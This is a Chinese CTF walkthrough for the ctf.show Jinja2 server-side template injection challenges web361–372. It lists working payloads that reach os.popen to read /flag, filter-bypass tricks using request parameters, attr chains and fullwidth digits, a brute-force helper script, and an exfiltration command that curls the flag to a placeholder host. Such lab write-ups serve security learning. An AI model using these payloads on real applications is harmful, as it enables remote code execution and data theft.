无过滤的小脚本

1
2
3
4
5
6
7
with open("python/ssti/1.txt","r+") as f:
    with open("python/ssti/2.txt","w+") as f1:
        lst=str(f.read()).split(',')
        for i in range(len(lst)):
            f1.write(str(i)+':'+lst[i]+'\n')
这样会将每一个类都标明序号
然后用查找器查找'os'

lipsum

1
Jinja2 模板引擎中,lipsum 是一个内置的全局函数,用于生成 Lorem Ipsum 占位文本。它通常用于快速填充模板中的文本内容,方便前端开发和测试。

web361

1
2
没有任何过滤
?name={{"".__class__.__mro__[1].__subclasses__()[132].__init__.__globals__['popen']("cat /flag").read()}}

web362

1
2
过滤了部分数字2
?name={{[].__class__.__base__.__subclasses__()[140-8].__init__.__globals__['popen']('cat /flag').read()}}

web363

1
2
过滤了单双引号
?name={{[].__class__.__base__.__subclasses__()[132].__init__.__globals__[request.args.a](request.args.b).read()}}&a=popen&b=cat /flag

web364

1
2
过滤了单双引号和args
?name={{[].__class__.__base__.__subclasses__()[132].__init__.__globals__[request.values.a](request.values.b).read()}}&a=popen&b=cat /flag

web365

1
2
过滤了[]和args 
?name={{().__class__.__base__.__subclasses__().__getitem__(132).__init__.__globals__.__getitem__(request.values.a)(request.values.b).read()}}&a=popen&b=cat /flag

web366

1
2
3
4
5
6
7
8
过滤' " [ _
用了 .
?name={{lipsum.__globals__.os.popen(request.values.a).read()}}&a =cat /flag
?name={{(lipsum|attr(request.cookies.x)).os.popen(request.cookies.y).read()}}
cookie: x=globals;y=cat /flag


?name= {{()|attr(request.values.a)|attr(request.values.b)|attr(request.values.c)(1)|attr(request.values.d)()|attr(request.values.c)(407)(request.values.e, shell=True, stdout=-1)|attr(request.values.f)()|attr(request.values.c)(0)}} &a=class&b=mro&c=getitem&d=subclasses&e=cat /flag&f=communicate

web367

1
2
过滤了os
?name={{(lipsum|attr(request.values.a)).get(request.values.b).popen(request.values.c).read()}}&a=__globals__&b=os&c=cat /flag

web368

1
2
3
过滤了request,但是是再{{}}中过滤了request,没有在{% %}过滤request

?name={%print(lipsum|attr(request.values.a)).get(request.values.b).popen(request.values.c).read() %}&a=__globals__&b=os&c=cat /flag

web369

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
{%%}中过滤了request
方法一 构造字符串
import requests
url="http://url:8080/?name={{% print (config|string|list).pop({}).lower() %}}"
payload="cat /flag"
result=""
for j in payload:
    for i in range(0,1000):
        r=requests.get(url=url.format(i))
        location=r.text.find("<h3>")
        word=r.text[location+4:location+5]
        if word==j.lower():
            print("(config|string|list).pop(%d).lower()  ==  %s"%(i,j))
            result+="(config|string|list).pop(%d).lower()~"%(i)
            break
print(result[:len(result)-1])
方法二 set构造字符
http://de1d82f0-b40d-430f-9cb5-ce2435f44306.chall.ctf.show:8080/?name=
{% set a=(()|select|string|list).pop(24) %}    // a = _
{% set globals=(a,a,dict(globals=1)|join,a,a)|join %}  // globals=__globals__
//dict(globals=1)|join|print 输出是globals
{% set init=(a,a,dict(init=1)|join,a,a)|join %}
{% set builtins=(a,a,dict(builtins=1)|join,a,a)|join %}
{% set a=(lipsum|attr(globals)).get(builtins) %}
{% set chr=a.chr %}
{% print a.open(chr(47)~chr(102)~chr(108)~chr(97)~chr(103)).read() %}

web370

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
过滤了全部数字
用全角字符绕过
下面是转换脚本
def half2full(half):
    full = ''
    for ch in half:
        if ord(ch) in range(33, 127):
            ch = chr(ord(ch) + 0xfee0)
        elif ord(ch) == 32:
            ch = chr(0x3000)
        else:
            pass
        full += ch
    return full
while 1:
    t = ''
    s = input("输入想要转换的数字字符串:")
    for i in s:
        t += half2full(i)
    print(t)
    
payload
?name=
{% set po=dict(po=a,p=a)|join%}
{% set a=(()|select|string|list)|attr(po)(24)%}
{% set ini=(a,a,dict(init=a)|join,a,a)|join()%}
{% set glo=(a,a,dict(globals=a)|join,a,a)|join()%}
{% set geti=(a,a,dict(getitem=a)|join,a,a)|join()%}
{% set built=(a,a,dict(builtins=a)|join,a,a)|join()%}
{% set x=(q|attr(ini)|attr(glo)|attr(geti))(built)%}
{% set chr=x.chr%}
{% set file=chr(47)%2bchr(102)%2bchr(108)%2bchr(97)%2bchr(103)%}

web371

1
2
3
4
5
6
7
8
9
10
11
12
半角数字转全角
def num2cn(num): res='' for i in num: res+=chr(ord(i)+65248) return res

字符串转ascill码
def str2ascill(s): return [num2cn(str(ord(c))) for c in s]

arr=(str2ascill("curl http://ip:port?p=`cat /flag`"))

res=''
for i in arr: res+='chr({i})~'.format(i=i)

print(res[:len(res)-1])

web372

1
2
过滤了count
上一题payload可以接着用